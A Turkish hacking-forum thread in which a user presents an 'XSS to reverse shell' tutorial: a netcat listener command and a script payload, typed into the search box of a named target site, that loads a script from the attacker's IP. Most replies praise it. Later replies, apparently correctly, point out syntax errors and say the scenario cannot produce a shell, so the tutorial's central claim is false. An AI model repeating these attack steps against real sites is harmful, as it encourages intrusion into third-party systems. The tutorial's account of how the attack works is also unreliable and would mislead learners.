XSS Açığı İle Reverse Shell!

[3FlowFlex4]

Merhaba Değerli TurkHackTeam Ailesi.

Bu Konumda Sizlere NetCat Aracı İle XSS Açıklı Siteye Sızmayı Göstereceğim, Umarım Konumu Beğenirsiniz Teşekkür Ederim.

Benim Hedef Sitem USA.com.

Şimdi Terminali Açıp Şu Komutu Yazalım.
Kod = nc -lnvp 4444

Şuan NetCat Aracımızı Dinlemeye Aldık Devam Edelim

USA.com Sitesine Gelip Arama Yerine Şu Kodu Yazalım.
Kod = <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//your_ip:4444"}},1010)</script>

Your_İP Yazan Kısıma Kendi İP Adresimizi Yazalım.

Enter Tuşuna Bastığımızda Terminale Gelip Bağlantının Gelip Gelmediğini Kontrol Edelim.

Bağlantı Geldiyse Siteye Sızmışsınız Demektir.

İyi Forumlar Dilerim.

 

[Taha']

Bundan sonraki konuları ortalarayak, güzel ve ugun resimler ekleyerek ve birazdaha renklendirerek paylasırsan güzel sonuclar cıkabilir.

 

[3FlowFlex4]

Bundan sonraki konuları ortalarayak, güzel ve ugun resimler ekleyerek ve birazdaha renklendirerek paylasırsan güzel sonuclar cıkabilir.

Hocam Konu Açmakta Çok Başarılı Değilim Deniyorum Birşeyler

 

[gyakdvani]

Merhaba Değerli TurkHackTeam Ailesi.

Bu Konumda Sizlere NetCat Aracı İle XSS Açıklı Siteye Sızmayı Göstereceğim, Umarım Konumu Beğenirsiniz Teşekkür Ederim.

Benim Hedef Sitem USA.com.

Şimdi Terminali Açıp Şu Komutu Yazalım.
Kod = nc -lnvp 4444

Şuan NetCat Aracımızı Dinlemeye Aldık Devam Edelim

USA.com Sitesine Gelip Arama Yerine Şu Kodu Yazalım.
Kod = <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//your_ip:4444"}},1010)</script>

Your_İP Yazan Kısıma Kendi İP Adresimizi Yazalım.

Enter Tuşuna Bastığımızda Terminale Gelip Bağlantının Gelip Gelmediğini Kontrol Edelim.

Bağlantı Geldiyse Siteye Sızmışsınız Demektir.

İyi Forumlar Dilerim.

Merhaba Değerli Üyemiz

konunuz yararı olabilecek düzeyde fakat sızmayı yapan ileri de gitmek isteyecektir.

sızma sonrası nelerin nasıl olduğunu nasıl kontrol edileceğini ne yapılması ve hatta indexe kadar giden yolu açıklamanız çok daha büyük bir fayda sağlayacaktır.

 

[3FlowFlex4]

Merhaba Değerli Üyemiz

konunuz yararı olabilecek düzeyde fakat sızmayı yapan ileri de gitmek isteyecektir.

sızma sonrası nelerin nasıl olduğunu nasıl kontrol edileceğini ne yapılması ve hatta indexe kadar giden yolu açıklamanız çok daha büyük bir fayda sağlayacaktır.

Hocam Orayı Ekleyecektim Fakat Ekleyemedim

 

[UZAY 52]

Merhaba Değerli TurkHackTeam Ailesi.

Bu Konumda Sizlere NetCat Aracı İle XSS Açıklı Siteye Sızmayı Göstereceğim, Umarım Konumu Beğenirsiniz Teşekkür Ederim.

Benim Hedef Sitem USA.com.

Şimdi Terminali Açıp Şu Komutu Yazalım.
Kod = nc -lnvp 4444

Şuan NetCat Aracımızı Dinlemeye Aldık Devam Edelim

USA.com Sitesine Gelip Arama Yerine Şu Kodu Yazalım.
Kod = <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//your_ip:4444"}},1010)</script>

Your_İP Yazan Kısıma Kendi İP Adresimizi Yazalım.

Enter Tuşuna Bastığımızda Terminale Gelip Bağlantının Gelip Gelmediğini Kontrol Edelim.

Bağlantı Geldiyse Siteye Sızmışsınız Demektir.

İyi Forumlar Dilerim.

Daha güzel olabilirdi konu yararlı

 

[w1sd0m]

Eline sağlık.

 

[3FlowFlex4]

Daha güzel olabilirdi konu yararlı

Teşekkür Ederim Hocam Daha İyisini Yapmaya Çalışıyorum

Eline sağlık.

Teşekkürler Hocam

 

[Fugit|ive]

Eline emeğine sağlık

 

[3FlowFlex4]

Eline emeğine sağlık

Teşekkür Ederim Hocam

 

[masonz]

Merhaba emeğine sağlık yalnız konu baya yetersiz kalmış görselli şekilde ve detayını vererek yapsaydın daha iyi olabilirdi.
Bundan sonraki konularında resim eklerseniz anlaşılması daha iyi olacaktır.

 

[3FlowFlex4]

Merhaba emeğine sağlık yalnız konu baya yetersiz kalmış görselli şekilde ve detayını vererek yapsaydın daha iyi olabilirdi.
Bundan sonraki konularında resim eklerseniz anlaşılması daha iyi olacaktır.

Teşekkür Ederim Hocam Bir Sonrakinde Daha İyi Yapacağım

 

[By 4lp3r3n]

Teşekkürler

 

[forwellsh]

Merhaba Değerli TurkHackTeam Ailesi.

Bu Konumda Sizlere NetCat Aracı İle XSS Açıklı Siteye Sızmayı Göstereceğim, Umarım Konumu Beğenirsiniz Teşekkür Ederim.

Benim Hedef Sitem USA.com.

Şimdi Terminali Açıp Şu Komutu Yazalım.
Kod = nc -lnvp 4444

Şuan NetCat Aracımızı Dinlemeye Aldık Devam Edelim

USA.com Sitesine Gelip Arama Yerine Şu Kodu Yazalım.
Kod = <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//your_ip:4444"}},1010)</script>

Your_İP Yazan Kısıma Kendi İP Adresimizi Yazalım.

Enter Tuşuna Bastığımızda Terminale Gelip Bağlantının Gelip Gelmediğini Kontrol Edelim.

Bağlantı Geldiyse Siteye Sızmışsınız Demektir.

İyi Forumlar Dilerim.

Hatalı
yazdıgın Payload yanı
<script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//your_ip:4444"}},1010)</script>



burada createElement("script") yanlıs kullanmıssın
document.createElement("script") olması gerek
Ayrıca setInterval içindeki süslü parantezler fazladan ve JavaScript syntax hatası oluşturabilir

düzeltilmis halı soyle olur
<script>
setInterval(function(){
with(document){
body.appendChild(createElement("script")).src="//your_ip:4444"
}
}, 1010);
</script>


ama burda sen //your_ip:4444 yaparak NetCat portunu dinlediğin IPden JavaScript dosyası indirmeye çalışacak. Ancak NetCat, basit TCP bağlantısı dinler HTTP sunucusu gibi davranmaz ve JavaScript dosyasını sunmaz
bu Yüzden baglantı Beklenmez

netcat ile reverse shell atmak için hedef cihazda netcat in calısıyor olması gerekır

 

[Anonimis]

Merhaba Değerli TurkHackTeam Ailesi.

Bu Konumda Sizlere NetCat Aracı İle XSS Açıklı Siteye Sızmayı Göstereceğim, Umarım Konumu Beğenirsiniz Teşekkür Ederim.

Benim Hedef Sitem USA.com.

Şimdi Terminali Açıp Şu Komutu Yazalım.
Kod = nc -lnvp 4444

Şuan NetCat Aracımızı Dinlemeye Aldık Devam Edelim

USA.com Sitesine Gelip Arama Yerine Şu Kodu Yazalım.
Kod = <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//your_ip:4444"}},1010)</script>

Your_İP Yazan Kısıma Kendi İP Adresimizi Yazalım.

Enter Tuşuna Bastığımızda Terminale Gelip Bağlantının Gelip Gelmediğini Kontrol Edelim.

Bağlantı Geldiyse Siteye Sızmışsınız Demektir.

İyi Forumlar Dilerim.

Konu güzel ancak resim kullansan daha iyi olurdu eline sağlık. (Son günlerde bende bunu öğrenmek istiyordum benim içinde yararlı oldu sağol.)

 

[raidenhan]

Hatalı
yazdıgın Payload yanı
<script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//your_ip:4444"}},1010)</script>



burada createElement("script") yanlıs kullanmıssın
document.createElement("script") olması gerek
Ayrıca setInterval içindeki süslü parantezler fazladan ve JavaScript syntax hatası oluşturabilir

düzeltilmis halı soyle olur
<script>
setInterval(function(){
with(document){
body.appendChild(createElement("script")).src="//your_ip:4444"
}
}, 1010);
</script>


ama burda sen //your_ip:4444 yaparak NetCat portunu dinlediğin IPden JavaScript dosyası indirmeye çalışacak. Ancak NetCat, basit TCP bağlantısı dinler HTTP sunucusu gibi davranmaz ve JavaScript dosyasını sunmaz
bu Yüzden baglantı Beklenmez

netcat ile reverse shell atmak için hedef cihazda netcat in calısıyor olması gerekır

Bu saldırı senaryosu baştan aşağı uydurma, hiçbir işe yaramaz. Boş post.

 

[haz3root]

Merhaba Değerli TurkHackTeam Ailesi.

Bu Konumda Sizlere NetCat Aracı İle XSS Açıklı Siteye Sızmayı Göstereceğim, Umarım Konumu Beğenirsiniz Teşekkür Ederim.

Benim Hedef Sitem USA.com.

Şimdi Terminali Açıp Şu Komutu Yazalım.
Kod = nc -lnvp 4444

Şuan NetCat Aracımızı Dinlemeye Aldık Devam Edelim

USA.com Sitesine Gelip Arama Yerine Şu Kodu Yazalım.
Kod = <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//your_ip:4444"}},1010)</script>

Your_İP Yazan Kısıma Kendi İP Adresimizi Yazalım.

Enter Tuşuna Bastığımızda Terminale Gelip Bağlantının Gelip Gelmediğini Kontrol Edelim.

Bağlantı Geldiyse Siteye Sızmışsınız Demektir.

İyi Forumlar Dilerim.

Güzel konu

 

[Bozkurtlum]

Eline Sağlık. Biraz görsel ve renkli metinler ve düzgün hizalama ile daha güzel olabilir.